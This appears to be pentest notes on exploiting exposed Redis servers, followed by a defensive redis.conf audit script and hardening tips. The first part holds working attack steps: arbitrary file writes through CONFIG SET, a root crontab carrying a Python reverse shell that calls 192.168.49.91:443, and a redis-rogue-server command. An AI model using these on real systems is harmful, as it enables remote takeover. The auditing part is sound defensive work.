Enumeration
Mandatory
- Try to connect:
  telnet $target 6379 // or: redis-cli -h $target
  ...
  info
  CONFIG GET *
  system.exec "id"
- Check whether directories exist (an error reply means the directory is missing):
  config set dir /var/www/htdocs
  -ERR Changing directory: No such file or directory
  config set dir /etc
  +OK
- Try to write.
  - General commands:
    config set dir /var/www/html
    +OK
    config set dbfilename t.txt
    +OK
    set test "hallo"
    +OK
    save
    +OK
  - Possible places:
    - Upload an SSH key (also consider the redis user).
    - Upload a reverse shell file
    - Upload a crontab file
      config set dir /var/spool/cron/crontabs/
      +OK
      config set dbfilename root
      +OK
      set test "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.91\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"
      +OK
      save
      +OK
- Try to use the redis-rogue-server:
  - Compile the redis execution module. make will create src/module.so.
  - Clone the redis-rogue-server.
  - Copy the module.so into the server’s directory as exp.so.
  - Execute:
    python3 redis-rogue-server.py --rhost $target --rport 6379 --lhost 192.168.49.91 --lport 443
Optional
- Try to upload an SSH key
- Try to set up a Redis slave that syncs all data to your own system, add data and push it to the master.
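
Every check above depends on a few redis.conf settings: unauthenticated access, a listener reachable from the network, and the CONFIG, SLAVEOF/REPLICAOF and MODULE commands being available. The following audit of a redis.conf is an added example, not part of the original page. The sample configs and finding names are constructed, and it assumes restrictions are expressed with rename-command rather than ACLs.

```python
import shlex

# Commands the steps above rely on; finding ids are constructed for this example.
RISKY_COMMANDS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE")
ALL_INTERFACES = ("0.0.0.0", "*", "::", "::*")

def parse_conf(text):
    """Parse redis.conf text into (directive, [args]) pairs, skipping comments."""
    lines = (l.strip() for l in text.splitlines())
    split = (shlex.split(l) for l in lines if l and not l.startswith("#"))
    return [(p[0].lower(), p[1:]) for p in split]

def audit(text):
    """Return finding ids for settings that leave the techniques above usable."""
    conf = parse_conf(text)
    last = {k: args for k, args in conf if k != "rename-command"}
    renamed = {a[0].upper() for k, a in conf if k == "rename-command" and a}
    findings = []
    if not (last.get("requirepass") or [""])[0]:
        findings.append("no-auth")
    # protected-mode defaults to yes, so only an explicit "no" is flagged
    if (last.get("protected-mode") or ["yes"])[0].lower() == "no":
        findings.append("protected-mode-off")
    # with no bind directive Redis listens on every interface
    binds = last.get("bind", [])
    if not binds or any(b.lstrip("-") in ALL_INTERFACES for b in binds):
        findings.append("bind-all-interfaces")
    for cmd in RISKY_COMMANDS:
        if cmd not in renamed:
            findings.append(cmd.lower() + "-not-restricted")
    return findings

# Constructed sample configs (not taken from any real host).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
"""

HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
requirepass "constructed-sample-passphrase"
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
"""

if __name__ == "__main__":
    print(audit(WEAK_CONF), audit(HARDENED_CONF))
```

Renaming a command to an empty string disables it. Running Redis as an unprivileged user with no write access to web roots, cron directories or ~/.ssh limits what a successful save can reach.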